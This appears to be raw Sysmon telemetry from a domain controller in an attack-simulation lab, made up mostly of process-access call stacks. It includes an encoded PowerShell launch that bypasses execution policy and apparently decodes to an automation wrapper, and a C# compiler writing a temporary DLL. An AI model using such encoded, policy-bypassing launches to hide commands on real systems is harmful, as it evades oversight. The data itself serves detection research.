08:40:25.071{5D479F2C-1504-5F84-0B00-000000007E01}8603768C:\Windows\system32\lsass.exe{5D479F2C-1679-5F84-0203-000000007E01}4308C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 11241100x8000000000000000236Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:25.040{5D479F2C-1679-5F84-0203-000000007E01}4308C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_tnuf33tk.b2w.ps12020-10-12 08:40:25.040 10341000x8000000000000000235Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:25.024{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1679-5F84-0203-000000007E01}4308C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000234Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:24.993{5D479F2C-1678-5F84-FF02-000000007E01}47564000C:\Windows\system32\conhost.exe{5D479F2C-1679-5F84-0203-000000007E01}4308C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000233Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:24.993{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000232Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:24.993{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000231Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:24.993{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000230Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:24.993{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000229Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:24.993{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000228Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:24.993{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000227Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:24.993{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000226Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:24.993{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000225Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:24.993{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000224Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:24.993{5D479F2C-14FE-5F84-0500-000000007E01}6401148C:\Windows\system32\csrss.exe{5D479F2C-1679-5F84-0203-000000007E01}4308C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000223Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:24.993{5D479F2C-1678-5F84-0103-000000007E01}46443544C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{5D479F2C-1679-5F84-0203-000000007E01}4308C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+362432a6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+356e4130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+356e3e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+36195466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+356a4997(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+35702e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+356e64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+356e64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+356e635c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+356d82e1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+356e4814(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+356e4407(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+356e4130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+356e3e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+36195466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+356cac62(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+356ca232(wow64) 154100x8000000000000000222Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:25.004{5D479F2C-1679-5F84-0203-000000007E01}4308C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==C:\Users\Administrator\ATTACKRANGE\Administrator{5D479F2C-1678-5F84-7C8C-110000000000}0x118c7c0HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{5D479F2C-1678-5F84-0103-000000007E01}4644C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA= 11241100x8000000000000000410Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.localDLL2020-10-12 08:40:26.977{5D479F2C-167A-5F84-0C03-000000007E01}4244C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\adoupm4p.dll2020-10-12 08:40:26.884 10341000x8000000000000000409Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.977{5D479F2C-167A-5F84-0703-000000007E01}50444736C:\Windows\system32\conhost.exe{5D479F2C-167A-5F84-0D03-000000007E01}5100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000408Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.962{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000407Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 